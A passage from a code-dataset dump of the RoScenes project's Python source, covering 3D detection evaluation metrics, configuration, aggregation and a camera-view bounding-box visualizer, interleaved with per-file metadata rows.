list(f"{x:.4f}" for x in self.allTP)) result = data2rst(table, use_headers=True, center_cells=True, center_headers=True) table = list() header = list() subHeader = list() spans = list() header.append("Class") subHeader.append("") spans.append([[0, 0], [1, 0]]) header.append("NDS") subHeader.append("") spans.append([[0, 1], [1, 1]]) header.append("AP") dists = (list(x for x in self.raw.values() if not x.isIgnored)[0].results.keys()) spans.append([[0, x] for x in range(len(header) - 1, len(header) + len(dists) - 1)]) for d in dists: header.append("") subHeader.append(f"{d:.1f}m") header.pop() for tpName in self.tpNames: header.append(tpName) subHeader.append("") spans.append([[0, len(header) - 1], [1, len(header) - 1]]) table.append(header) table.append(subHeader) for name in self.raw.keys(): raw = self.raw[name] if raw.isIgnored: table.append([name, "Ignored"] + [""] * (len(self.tpNames) + len(dists))) spans.append([[len(table) - 1, x] for x in range(1, len(self.tpNames) + len(dists) + 1 + 1)]) continue row = [name] tps = raw.tps() nds = (raw.mAP() * raw.apWeight + np.sum(1 - tps)) / (2 * raw.apWeight) row.append(f"{nds:.4f}") for dist in self.raw[name].results.keys(): row.append(f"{raw.ap(dist):.4f}") for i, tpName in enumerate(self.tpNames): row.append(f"{tps[i]:.4f}") table.append(row) result += os.linesep result += data2rst(table, spans=spans, use_headers=True, center_cells=True, center_headers=True) return result @property def mAP(self): # [n_class] aps = list(v[0] for v in self.values.values()) return np.mean(aps) @property def allTP(self): # [n_class, n_tp] tps = np.stack(list(v[1] for v in self.values.values())) return np.clip(np.mean(tps, 0), 0, 1) @property def result(self) -> float: # [n_class] aps = list(v[0] for v in self.values.values()) # [n_class, n_tp] tps = np.stack(list(v[1] for v in self.values.values())) mAP, sumTP = np.mean(aps), np.sum(1 - np.clip(np.mean(tps, 0), 0, 1)) return ((mAP * self.apWeight) + sumTP) / (2 * self.apWeight) @property def summary(self) -> dict[str, float]: detail = dict() metric_prefix = f'RoScenes' for name in self.values.keys(): raw = self.raw[name] if raw.isIgnored: continue for dist in self.raw[name].results.keys(): detail['{}/{}_AP_dist_{}'.format(metric_prefix, name, dist)] = f"{raw.ap(dist):.4f}" tps = raw.tps() for i, tpName in enumerate(self.tpNames): detail['{}/{}_{}'.format(metric_prefix, name, tpName)] = f"{tps[i]:.4f}" # [#tp] allTPs = self.allTP for i, tpName in enumerate(self.tpNames): detail['{}/m{}'.format(metric_prefix, tpName)] = allTPs[i] detail['{}/NDS'.format(metric_prefix)] = self.result detail['{}/mAP'.format(metric_prefix)] = self.mAP return detail
9,304
Python
.py
222
33.418919
178
0.597589
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,431
handlers.py
roscenes_RoScenes/roscenes/evaluation/detection/handlers.py
# RoScenes # Copyright (C) 2024 Alibaba Cloud # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. from abc import ABC, abstractmethod from typing import Any import numpy as np import numpy.typing as npt from scipy.spatial.transform import Rotation from roscenes.evaluation.detection.result import APResult, TPResult from roscenes.misc import Registry class HandlerReg(Registry): pass class Handler(ABC): name: str @abstractmethod def handle(self, *, gtBoxes: npt.NDArray[np.float64], gtVelocities: npt.NDArray[np.float64], predBoxes: npt.NDArray[np.float64], predVelocities: npt.NDArray[np.float64], predScores: npt.NDArray[np.float64], assignResult: npt.NDArray[np.float64]): """Calculate evalutaion metrics using groundtruth and prediction. Args: gtBoxes (np.ndarray): [N, 10+] array, which at least contains xyz, wlh, q1q2q3q4. gtLabels (np.ndarray): [N], int label predBoxes (np.ndarray): [n, 10+] array predLabels (np.ndarray): [n], int label predScores (np.ndarray): [n] scores assignResult (np.ndarray): [n] for each prediction, the matched gt index. -1 if no assignment available """ raise NotImplementedError def __call__(self, *args: Any, **kwds: Any): return self.handle(*args, **kwds) class RanklistHandler(Handler): pass class TruePositiveHandler(Handler): def handle(self, *, gtBoxes: npt.NDArray[np.float64], gtVelocities: npt.NDArray[np.float64], predBoxes: npt.NDArray[np.float64], predVelocities: npt.NDArray[np.float64], predScores: npt.NDArray[np.float64], assignResult: npt.NDArray[np.float64]): # NOTE: assignResult < 0 means a false one if np.sum(assignResult >= 0) < 1: # If no true positives, return all 1 (max error) TPResult. return TPResult(np.ones_like(predScores), predScores) else: return None @HandlerReg.register class PrecisionRecall(RanklistHandler): def handle(self, *, gtBoxes: npt.NDArray[np.float64], predScores: npt.NDArray[np.float64], assignResult: npt.NDArray[np.float64], **_): # NOTE: assignResult < 0 means a false one matches = assignResult >= 0 tp = np.cumsum(matches.astype(np.float64)) fp = np.cumsum((~matches).astype(np.float64)) prec = tp / (fp + tp) recall = tp / float(len(gtBoxes)) return APResult(prec, recall, predScores.copy()) @HandlerReg.register class TranslationError(TruePositiveHandler): def handle(self, *, gtBoxes: npt.NDArray[np.float64], predBoxes: npt.NDArray[np.float64], predScores: npt.NDArray[np.float64], assignResult: npt.NDArray[np.float64], **kwargs): check = super().handle(gtBoxes=gtBoxes, predBoxes=predBoxes, predScores=predScores, assignResult=assignResult, **kwargs) if check is not None: return check # NOTE: assignResult < 0 means a false one mask = assignResult >= 0 # [#tp, 10+] findedBoxes = gtBoxes[assignResult[mask]] predBoxes = predBoxes[mask] # [#tp] centerDistance = np.sqrt(((findedBoxes[:, :2] - predBoxes[:, :2]) ** 2).sum(-1)) score = predScores[mask] return TPResult(centerDistance, score) @HandlerReg.register class ScaleError(TruePositiveHandler): def handle(self, *, gtBoxes: npt.NDArray[np.float64], predBoxes: npt.NDArray[np.float64], predScores: npt.NDArray[np.float64], assignResult: npt.NDArray[np.float64], **kwargs): check = super().handle(gtBoxes=gtBoxes, predBoxes=predBoxes, predScores=predScores, assignResult=assignResult, **kwargs) if check is not None: return check # NOTE: assignResult < 0 means a false one mask = assignResult >= 0 # [#tp, 10+] findedSize = gtBoxes[assignResult[mask]][:, 3:6] predSize = predBoxes[mask][:, 3:6] findedVolume = np.prod(findedSize, -1) predVolume = np.prod(predSize, -1) minVolume = np.prod(np.min(np.stack([findedSize, predSize], 1), 1), -1) # [#tp] iou = minVolume / (findedVolume + predVolume - minVolume) score = predScores[mask] return TPResult(1 - iou, score) @HandlerReg.register class VelocityError(TruePositiveHandler): def handle(self, *, gtVelocities: npt.NDArray[np.float64], predVelocities: npt.NDArray[np.float64], predScores: npt.NDArray[np.float64], assignResult: npt.NDArray[np.float64], **kwargs): check = super().handle(gtVelocities=gtVelocities, predVelocities=predVelocities, predScores=predScores, assignResult=assignResult, **kwargs) if check is not None: return check # NOTE: assignResult < 0 means a false one mask = assignResult >= 0 # [#tp, 2] findedV = gtVelocities[assignResult[mask]] predV = predVelocities[mask] # [#tp, 2] velocityDiff = np.sqrt(((findedV - predV) ** 2).sum(-1)) score = predScores[mask] return TPResult(velocityDiff, score) @HandlerReg.register class OrientationError(TruePositiveHandler): def handle(self, *, gtBoxes: npt.NDArray[np.float64], predBoxes: npt.NDArray[np.float64], predScores: npt.NDArray[np.float64], assignResult: npt.NDArray[np.float64], **kwargs): check = super().handle(gtBoxes=gtBoxes, predBoxes=predBoxes, predScores=predScores, assignResult=assignResult, **kwargs) if check is not None: return check # NOTE: assignResult < 0 means a false one mask = assignResult >= 0 # [#tp, 4] findedRotation = gtBoxes[assignResult[mask]][:, 6:10] predRotation = predBoxes[mask][:, 6:10] # [#tp] # assume gt = diff * pred # so diff = gt * (pred)^-1 # magnitude = rad diff angle # range = [0, pi] rotationMagnitude = (Rotation.from_quat(findedRotation) * Rotation.from_quat(predRotation).inv()).magnitude() score = predScores[mask] return TPResult(rotationMagnitude, score) if __name__ == "__main__": mask = np.random.rand(25)>0.5 recall = np.cumsum(mask) recall = recall / recall[-1] recall_interp = np.linspace(0, 1, 101) conf = np.sort(np.random.rand(25))[::-1] value = np.sort(np.random.rand(25)) conf_interp=np.interp(recall_interp, recall, conf, right=0) value_interp1 = np.interp(conf_interp[::-1], conf[mask][::-1], value[mask][::-1])[::-1] value_interp2 = np.interp(recall_interp, recall[mask], value[mask]) import matplotlib.pyplot as plt fig, (ax1, ax2) = plt.subplots(1, 2) ax1.plot(recall_interp, conf_interp) ax2.plot(recall_interp, value_interp1, c="r") ax2.plot(recall_interp, value_interp2, c="b") plt.savefig("interpolate.png")
7,394
Python
.py
143
44.979021
250
0.675526
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,432
config.py
roscenes_RoScenes/roscenes/evaluation/detection/config.py
# RoScenes # Copyright (C) 2024 Alibaba Cloud # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. from dataclasses import dataclass, field from enum import Enum from roscenes.consts import strLabels from .handlers import HandlerReg, Handler, RanklistHandler class ThresholdMetric(Enum): CenterDistance = 1 IOU = 2 # NOTE: not implemented @dataclass class DetectionEvaluationConfig: classes: list[str] matchingThreshold: list[float] tpThreshold: float thresholdMetric: ThresholdMetric maxBoxesPerSample: int scoreFilter: float rangeFilter: tuple[float, float, float, float, float, float] handlers: list[str] _handlerInstances: list[Handler] = field(init=False) def __post_init__(self): # Check parameters are valid. if len(self.handlers) < 1: raise ValueError(f'None of metrics are given. Availabe metrics: {HandlerReg.summary()}.') if any(x <= 0. for x in self.matchingThreshold): raise ValueError('The given matching threshold has one threshold lower than 0.') if self.tpThreshold not in self.matchingThreshold: raise KeyError("The given tp theshold should be one of matching threshold.") if not 0.0 <= self.scoreFilter < 1: raise ValueError("The givem score based prediction filter should be in [0, 1).") if len (self.rangeFilter) != 6 or not (self.rangeFilter[0] < self.rangeFilter[3]) and (self.rangeFilter[1] < self.rangeFilter[4]) and (self.rangeFilter[2] < self.rangeFilter[5]): raise ValueError("The given range based detection filter has wrong bound (length should be 6, min should < max).") if not self.maxBoxesPerSample > 0: raise ValueError("The given maximum predicted boxes filter should be larger than 0.") self._handlerInstances = [HandlerReg.get(x)() for x in self.handlers] if not any(isinstance(x, RanklistHandler) for x in self._handlerInstances): raise ValueError('You must provide at least one ranklist-based metric (for example, `PrecisionRecall`).') defaultEvaluationConfig = DetectionEvaluationConfig( classes=list(strLabels.keys()), matchingThreshold=[0.5, 1., 2., 4.], tpThreshold=2., thresholdMetric=ThresholdMetric.CenterDistance, maxBoxesPerSample=500, scoreFilter=0.0, rangeFilter=[-400., -40., 0., 400., 40., 6.], handlers=[ 'PrecisionRecall', 'TranslationError', 'ScaleError', 'OrientationError', 'VelocityError' # TBD. ] )
3,169
Python
.py
66
42.621212
186
0.707081
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,433
aggregator.py
roscenes_RoScenes/roscenes/evaluation/detection/aggregator.py
# RoScenes # Copyright (C) 2024 Alibaba Cloud # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. from __future__ import annotations import numpy as np from roscenes.evaluation.detection.result import ThresholdDetectionResult, ClassWiseDetectionResult class ClasswiseAggregator: def __init__(self, tpNames: list[str], idLabelMapping: dict[int, str]): self.tpNames = tpNames self.idLabelMapping = idLabelMapping def __call__(self, results: dict[int, ThresholdDetectionResult]) -> ClassWiseDetectionResult: apWeights = np.array(list(v.apWeight for v in results.values() if not v.isIgnored)) if not np.allclose(apWeights, np.mean(apWeights)): raise ValueError("ap weights.") res = dict() for label, result in results.items(): if result.isIgnored: continue res[self.idLabelMapping[label]] = result.result return ClassWiseDetectionResult(res, result.apWeight, {self.idLabelMapping[key]: value for key, value in results.items()}, self.tpNames)
1,679
Python
.py
32
47.75
144
0.719586
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,434
prediction.py
roscenes_RoScenes/roscenes/evaluation/detection/prediction.py
# RoScenes # Copyright (C) 2024 Alibaba Cloud # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. from dataclasses import dataclass import numpy as np import numpy.typing as npt @dataclass class Prediction: timeStamp: int boxes3D: npt.NDArray[np.float64] velocities: npt.NDArray[np.float64] labels: npt.NDArray[np.float64] scores: npt.NDArray[np.float64] token: str def sort(self, maxPredictionPerSample: int): """Sort boxes by score.""" if len(self.boxes3D) > maxPredictionPerSample: raise ValueError(f"A prediction has too much boxes ({len(self.boxes3D)} boxes), which exceeds `maxBoxesPerSample = {maxPredictionPerSample}`. (token: {self.token}).") # [N] bigger is higher indices = np.argsort(-self.scores) self.boxes3D = self.boxes3D[indices] self.scores = self.scores[indices] self.labels = self.labels[indices] self.velocities = self.velocities[indices]
1,590
Python
.py
36
40.166667
178
0.717419
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,435
__init__.py
roscenes_RoScenes/roscenes/evaluation/detection/__init__.py
# RoScenes # Copyright (C) 2024 Alibaba Cloud # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. from roscenes.evaluation.detection.evaluator import MultiView3DEvaluator from roscenes.evaluation.detection.config import DetectionEvaluationConfig, ThresholdMetric from roscenes.evaluation.detection.prediction import Prediction
948
Python
.py
18
51.722222
91
0.780881
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,436
evaluator.py
roscenes_RoScenes/roscenes/evaluation/detection/evaluator.py
# RoScenes # Copyright (C) 2024 Alibaba Cloud # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. from __future__ import annotations import warnings from itertools import product import numpy as np import numpy.typing as npt from joblib import Parallel, delayed from roscenes.data.scene import Scene from roscenes.evaluation.detection.prediction import Prediction from roscenes.evaluation.detection.result import ClassWiseDetectionResult, DetectionResult, ThresholdDetectionResult, TPResult from roscenes.evaluation.detection.handlers import RanklistHandler, TruePositiveHandler from roscenes.evaluation.detection.config import DetectionEvaluationConfig, ThresholdMetric from roscenes.evaluation.detection.aggregator import ClasswiseAggregator from roscenes.consts import richProgress from roscenes.misc import progressedJoblib class MultiView3DEvaluator: def __init__(self, config: DetectionEvaluationConfig): if config.thresholdMetric == ThresholdMetric.IOU: raise NotImplementedError self.config = config self.handlers = config.createHandlers() self._labelIDMapping = {c: i for i, c in enumerate(self.config.classes)} self.progress = richProgress def __call__(self, clip: Scene, prediction: list[Prediction]) -> ClassWiseDetectionResult: with self.progress: return self.collectResult(clip, prediction) def _checkCorrespondence(self, clip: Scene, prediction: list[Prediction]): if len(clip) != len(prediction): warnings.warn(f"The given prediction length mismatch. Expected (gt) length: {len(clip)}. Got length: {len(prediction)}") for v, p in zip(clip, prediction): if v.token != p.token: raise ValueError(f"Clip and prediction tokens are not matched. Clip token: {v.token}, prediction token: {p.token}.") if v.timeStamp != p.timeStamp: raise ValueError(f"Clip and prediction are not time aligned at {v.token} (timestamp: {v.timeStamp}) and {p.token} (timestamp: {p.timeStamp}).") def _filterGT(self, gtBoxes: npt.NDArray[np.float64], gtLabels: npt.NDArray[np.float64], gtVelocity: npt.NDArray[np.float64], gtViewIdx: npt.NDArray[np.float64]): x, y, z = gtBoxes[:, 0], gtBoxes[:, 1], gtBoxes[:, 2] xmin, ymin, zmin, xmax, ymax, zmax = self.config.rangeFilter mask = (x >= xmin) * (x <= xmax) * (y >= ymin) * (y <= ymax) * (z >= zmin) * (z <= zmax) return gtBoxes[mask], gtLabels[mask], gtVelocity[mask], gtViewIdx[mask] def _filterPred(self, predBoxes: npt.NDArray[np.float64], predLabels: npt.NDArray[np.float64], predVelocity: npt.NDArray[np.float64], predViewIdx: npt.NDArray[np.float64], predScores: npt.NDArray[np.float64]): x, y, z = predBoxes[:, 0], predBoxes[:, 1], predBoxes[:, 2] xmin, ymin, zmin, xmax, ymax, zmax = self.config.rangeFilter mask = (x >= xmin) * (x <= xmax) * (y >= ymin) * (y <= ymax) * (z >= zmin) * (z <= zmax) mask *= predScores >= self.config.scoreFilter # just filter labels that out of range mask *= (predLabels < len(self.config.classes)) * (predLabels >= 0) return predBoxes[mask], predLabels[mask], predVelocity[mask], predViewIdx[mask], predScores[mask] def collectResult(self, clip: Scene, prediction: list[Prediction]) -> ClassWiseDetectionResult: self._checkCorrespondence(clip, prediction) task = self.progress.add_task('Collecting groundtruth', total=len(clip)) # NOTE: need to join all views' boxes to a single one for evaluation gtBoxes, gtLabels, gtVelocity, gtViewIdx = list(), list(), list(), list() for i, views in enumerate(clip): gtBoxes.append(views.boxes3D) gtLabels.append(views.labels) gtVelocity.append(views.velocities) gtViewIdx.append(np.full_like(views.labels, i, dtype=np.int64)) self.progress.update(task, advance=1) self.progress.remove_task(task) gtBoxes, gtLabels, gtVelocity, gtViewIdx = map(np.concatenate, [gtBoxes, gtLabels, gtVelocity, gtViewIdx]) task = self.progress.add_task('Collecting prediction', total=len(clip)) predBoxes, predLabels, predVelocity, predViewIdx, predScores = list(), list(), list(), list(), list() for i, pred in enumerate(prediction): pred.sortAndPrune(self.config.maxBoxesPerSample) predBoxes.append(pred.boxes3D) predLabels.append(pred.labels) predVelocity.append(pred.velocities) predViewIdx.append(np.full_like(pred.labels, i, dtype=np.int64)) predScores.append(pred.scores) self.progress.update(task, advance=1) self.progress.remove_task(task) predBoxes, predLabels, predVelocity, predViewIdx, predViewIdx, predScores = map(np.concatenate, [predBoxes, predLabels, predVelocity, predViewIdx, predViewIdx, predScores]) gtBoxes, gtLabels, gtVelocity, gtViewIdx = self._filterGT(gtBoxes, gtLabels, gtVelocity, gtViewIdx) predBoxes, predLabels, predVelocity, predViewIdx, predScores = self._filterPred(predBoxes, predLabels, predVelocity, predViewIdx, predScores) # finally, sort all predictions by score, descending predSortIdx = np.argsort(-predScores) predBoxes, predLabels, predVelocity, predViewIdx, predScores = predBoxes[predSortIdx], predLabels[predSortIdx], predVelocity[predSortIdx], predViewIdx[predSortIdx], predScores[predSortIdx] def _parallelRun(label, threshold): label = self._labelIDMapping[label] gtMask = gtLabels == label if gtMask.sum() < 1: return label, threshold, None gtBoxesOfLabel = gtBoxes[gtMask].copy() gtVelocityOfLabel = gtVelocity[gtMask].copy() gtViewIdxOfLabel = gtViewIdx[gtMask].copy() predMask = predLabels == label if predMask.sum() < 1: return label, threshold, DetectionResult.nothing(0 if threshold != self.config.tpThreshold else len([x for x in self.handlers if not isinstance(x, RanklistHandler)])) # already sorted by score predBoxesOfLabel = predBoxes[predMask].copy() predScoresOfLabel = predScores[predMask].copy() predVelocityOfLabel = predVelocity[predMask].copy() predViewIdxOfLabel = predViewIdx[predMask].copy() return label, threshold, self._labelResult(threshold, gtBoxesOfLabel, gtVelocityOfLabel, gtViewIdxOfLabel, predBoxesOfLabel, predVelocityOfLabel, predViewIdxOfLabel, predScoresOfLabel) params = list(product(self.config.classes, self.config.matchingThreshold)) with progressedJoblib(self.progress, 'Collecting result', total=len(params)): dispatcher = Parallel(-1) returnedValue = dispatcher(delayed(_parallelRun)(*p) for p in params) results = dict() for label, threshold, v in returnedValue: if v is None: results[label] = ThresholdDetectionResult.ignored(label) continue if label not in results: results[label] = dict() results[label][threshold] = v for label in results: if isinstance(results[label], dict): results[label] = ThresholdDetectionResult(label, results[label]) return ClasswiseAggregator(list(handler.name for handler in self.handlers if isinstance(handler, TruePositiveHandler)), {value: key for key, value in self._labelIDMapping.items()})(results) def _labelResult(self, threshold: float, gtBoxes: npt.NDArray[np.float64], gtVelocities: npt.NDArray[np.float64], gtViewIdxOfLabel: npt.NDArray[np.float64], predBoxes: npt.NDArray[np.float64], predVelocities: npt.NDArray[np.float64], predViewIdxOfLabel: npt.NDArray[np.float64], predScores: npt.NDArray[np.float64]) -> DetectionResult: # total assign result (which prediction is matched with which groundtruth) used for metric assignResult = -np.ones([len(predViewIdxOfLabel)], dtype=np.int64) allViewsIdx = np.unique(gtViewIdxOfLabel) for idx in allViewsIdx: filteredGT = gtViewIdxOfLabel == idx filteredPred = predViewIdxOfLabel == idx # [#num_filtered_gt] maps index of gt[filteredGT] to global gtLocalIndexMapping = np.argwhere(filteredGT).squeeze(-1) if self.config.thresholdMetric == ThresholdMetric.IOU: raise NotImplementedError # use pytorch3d calculate this, not tested. # [n, N], prediction to gt distances, pair-wise _, distance = box3d_overlap(torch.from_numpy(xyzwlhq2corners(predBoxes[filteredPred]).astype(np.float32)), torch.from_numpy(xyzwlhq2corners(gtBoxes[filteredGT]).astype(np.float32))) else: # NOTE: nuScenes only consider xy for distance computation distance = np.sqrt(((predBoxes[filteredPred, None, :2] - gtBoxes[filteredGT, :2]) ** 2).sum(-1)) # [n, N], pred to gt distance, from nearest to farthest sortedDistance = np.sort(distance, -1) # [n, N], pred to gt indices, from nearest to farthest sortedIdx = np.argsort(distance, -1) # [n] int. >0 -> tp with a matching gt idx, -1 -> fp # indicating the ith prediction matches the assigned[i] gt assigned = _assignPoints(sortedDistance, sortedIdx, threshold) # remap to global gt index assigned[assigned >= 0] = gtLocalIndexMapping[assigned[assigned >= 0]] # fill them back to total assign result assignResult[filteredPred] = assigned apResult = None tpResults = list() for handler in self.handlers: if threshold != self.config.tpThreshold and not isinstance(handler, RanklistHandler): continue r = handler(gtBoxes=gtBoxes, gtVelocities=gtVelocities, predBoxes=predBoxes, predVelocities=predVelocities, predScores=predScores, assignResult=assignResult) if isinstance(r, TPResult): tpResults.append(r) elif apResult is not None: raise RuntimeError("Duplicated AP result.") else: apResult = r return DetectionResult(apResult, tpResults) # ThresholdDetectionResult(label, {t: v[0] for t, v in result.items()}, {t: v[1] for t, v in result.items()}) # N1 = 1000, N2 = 3000, run 20 times uses 15s. def _assignPoints(sortedDis, sortedIdx, threshold): N1, N2 = sortedDis.shape unAssigned = set(list(range(N2))) matched = sortedDis <= threshold result = -np.ones([N1], dtype=np.int64) for i in range(N1): # [?] matchedPoints = sortedIdx[i][matched[i]] if len(matchedPoints) < 1: # All of points are not in threshold result[i] = -1 continue remaining = np.intersect1d(list(unAssigned), matchedPoints, assume_unique=True) if len(remaining) == 0: # This row is a duplicate detection that one row before it has assigned its nearest gt. result[i] = -1 continue # The nearest, unassigned point index remaining = np.in1d(matchedPoints, remaining) finded = matchedPoints[remaining][0] unAssigned.remove(finded) result[i] = finded if len(unAssigned) < 1: # no points left break return result
12,179
Python
.py
192
53.697917
339
0.676485
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,437
__main__.py
roscenes_RoScenes/roscenes/visualizer/__main__.py
# RoScenes # Copyright (C) 2024 Alibaba Cloud # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. from __future__ import annotations from dataclasses import dataclass import os import cv2 import seaborn as sns import numpy as np from PIL import Image from shapely.geometry import Polygon from roscenes.typing import StrPath from roscenes.data.scene import Scene from roscenes.data.frame import Frame from roscenes.data.camera import Camera from roscenes.evaluation.detection.prediction import Prediction _trackingPalette = (np.float32(sns.color_palette('husl', 32)) * 255).astype(np.uint8).tolist() _cv2TrackingPalette = (np.float32(sns.color_palette('husl', 32)) * 255).astype(np.uint8)[..., ::-1].tolist() @dataclass class VisualizerConfig: predictionVisualizeThreshold: float = 0.3 palette: tuple[tuple[int]] = ( # RGB uint8 ( 0, 0, 0), (255, 0, 0), # truck ( 0, 0, 255), # bus ( 0, 255, 0), # van (255, 255, 0), # car ) cv2Palette: tuple[tuple[int]] = ( # BGR uint8 ( 0, 0, 0), ( 0, 0, 255), # truck (255, 0, 0), # bus (0, 255, 0), # van ( 0, 255, 255), # car ) split: bool = False tracking: bool = False trackingPalette = _trackingPalette cv2TrackingPalette = _cv2TrackingPalette class Visualizer: def __init__(self, scene: Scene, config: VisualizerConfig, prediction: list[Prediction] = None): self.scene = scene self.config = config self.prediction = prediction def _plotBox(self, image: StrPath, corners: np.ndarray, label: np.ndarray, instanceID: np.ndarray, shift: int = 4) -> np.ndarray: # sub-pixel sampling, pass shift to cv2 functions pointMultiplier = 2 ** shift # sort by depth sortIds = np.argsort(-np.mean(corners[..., -1], -1)) # [N, 8, 2] corners = corners[sortIds, ..., :2] label = label[sortIds] instanceID = instanceID[sortIds] # NOTE: use pillow to load heic file img = cv2.cvtColor(np.asarray(Image.open(image)), cv2.COLOR_RGB2BGR) cleanImg = img.copy() for singleCorner, singleLabel, singleID in zip(corners, label, instanceID): # sub-pixel sampling, pass shift to cv2 functions singleCorner = singleCorner * pointMultiplier # crop the clean object region # paste to current image # then draw line objectPoly = Polygon(singleCorner) objectPoly = np.array(objectPoly.convex_hull.exterior.coords, dtype=np.int32) mask = np.zeros_like(cleanImg[..., 0]) cv2.fillPoly(mask, [objectPoly], (255, 255, 255), cv2.LINE_AA, shift) fg = cv2.bitwise_and(cleanImg, cleanImg, mask=mask) bg = cv2.bitwise_and(img, img, mask=cv2.bitwise_not(mask)) img = cv2.add(fg, bg) lineColor = self.config.cv2Palette[singleLabel] if not self.config.tracking else self.config.cv2TrackingPalette[singleID % len(self.config.cv2TrackingPalette)] cv2.polylines(img, [singleCorner[[2, 3, 7, 6]].astype(int)], True, lineColor, 2, cv2.LINE_AA, shift) # NOTE: hard-coded heading face cv2.polylines(img, [singleCorner[:4].astype(int)], True, lineColor, 2, cv2.LINE_AA, shift) cv2.polylines(img, [singleCorner[4:].astype(int)], True, lineColor, 2, cv2.LINE_AA, shift) cv2.polylines(img, [singleCorner[[0, 1, 5, 4]].astype(int)], True, [255, 255, 255], 2, cv2.LINE_AA, shift) return img def _plotBEV(self, box): pass def _visualize(self, frames: list[Frame], predictions: list[Prediction] = None): results = list() for frame in frames: frameResult = list() # sort by camera location and focal length for token, camera in sorted(frame.parent.cameras.items(), key=lambda x: (np.linalg.inv(x[1].extrinsic)[0, -1], x[1].intrinsic[0, 0])): image = frame.images[token] # has GT (not test set) if frame.visibleProjected3DBoxes is not None: # [n, 8, 3] visibleBoxes = frame.visibleProjected3DBoxes[token] # [n, 8, 4] imageBoxes = (np.concatenate([visibleBoxes, np.ones_like(visibleBoxes[..., -1:])], -1) @ camera.intrinsic.T)[..., :3] imageBoxes[..., :2] /= imageBoxes[..., 2:] frameResult.append((camera.name, self._plotBox(image, imageBoxes[..., :3], frame.visibleLabels[token], frame.visibleInstanceIDs[token], 4))) else: frameResult.append((camera.name, cv2.imread(image))) results.append((frame.token, frameResult)) return results def __getitem__(self, idx): frames = self.scene[idx] if not isinstance(frames, list): frames = [frames] result = self._visualize(frames, ) return result def __len__(self): return len(self.scene) if __name__ == "__main__": import sys path = sys.argv[1] tgt = sys.argv[2] tracking = bool(int(sys.argv[3])) visualizer = Visualizer(Scene.load(path), VisualizerConfig(tracking=tracking)) print(f'Start to visualize {path}...') os.makedirs(tgt) i = 0 while i < len(visualizer): result = visualizer[i] for frame_idx, frame_content in result: os.makedirs(os.path.join(tgt, f'{frame_idx}')) for camera_id, img in frame_content: cv2.imwrite(os.path.join(tgt, frame_idx, f'{camera_id}.jpg'), img) print(f'{i}-th frame visualized, continue? [y/n]: ') while True: response = input() if response.lower() == 'y': break elif response.lower() == 'n': print('bye!') exit() else: print('Please enter y or n: ') i += 1
6,640
Python
.py
143
37.937063
171
0.613162
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,438
__init__.py
roscenes_RoScenes/roscenes/visualizer/__init__.py
